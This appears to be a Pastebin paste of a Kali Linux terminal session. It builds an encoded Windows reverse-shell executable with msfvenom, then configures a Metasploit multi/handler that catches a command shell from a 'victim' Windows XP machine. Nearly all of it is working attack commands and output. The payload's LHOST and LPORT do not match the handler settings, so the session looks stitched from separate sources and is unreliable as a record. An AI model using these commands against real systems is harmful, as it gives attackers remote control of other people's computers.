Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- oot@kali:~# msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
- Found 1 compatible encoders
- Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
- x86/shikata_ga_nai succeeded with size 326 (iteration=0)
- x86/shikata_ga_nai chosen with final size 326
- Payload size: 326 bytes
- Saved as: /tmp/1.exe
- root@kali:# file /tmp/1.exe
- /tmp/1.exe: PE32 executable (GUI) Intel 80386, for MS Windows
- _______________________________
- root@kali:# msfconsole
- ## ### ## ##
- ## ## #### ###### #### ##### ##### ## #### ######
- ####### ## ## ## ## ## ## ## ## ## ## ### ##
- ####### ###### ## ##### #### ## ## ## ## ## ## ##
- ## # ## ## ## ## ## ## ##### ## ## ## ## ##
- ## ## #### ### ##### ##### ## #### #### #### ###
- ##
- =[ metasploit v4.11.3-2015063001 [core:4.11.3.pre.2015063001 api:1.0.0]]
- + -- --=[ 1465 exploits - 839 auxiliary - 230 post ]
- + -- --=[ 428 payloads - 37 encoders - 8 nops ]
- msf > use exploit/multi/handler
- msf exploit(handler) > show options
- Module options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Exploit target:
- Id Name
- -- ----
- 0 Wildcard Target
- ----------------------------------------
- msf exploit(handler) > set payload windows/shell/reverse_tcp
- payload => windows/shell/reverse_tcp
- msf exploit(handler) > show options
- Module options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Payload options (windows/shell/reverse_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- EXITFUNC thread yes Exit technique: seh, thread, process
- LHOST yes The local address
- LPORT 4444 yes The local port
- Exploit target:
- Id Name
- -- ----
- 0 Wildcard Target
- msf exploit(handler) > set LHOST 172.16.104.130
- LHOST => 172.16.104.130
- msf exploit(handler) > set LPORT 31337
- LPORT => 31337
- msf exploit(handler) >
- Now that we have everything set up and ready to go, we run ‘exploit’ for the multi/handler and execute our generated executable on the victim. The multi/handler handles the exploit for us and presents us our shell.
- msf exploit(handler) > exploit
- [*] Handler binding to LHOST 0.0.0.0
- [*] Started reverse handler
- [*] Starting the payload handler...
- [*] Sending stage (474 bytes)
- [*] Command shell session 2 opened (172.16.104.130:31337 -> 172.16.104.128:1150)
- Microsoft Windows XP [Version 5.1.2600]
- (C) Copyright 1985-2001 Microsoft Corp.
- C:\Documents and Settings\Victim\My Documents>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement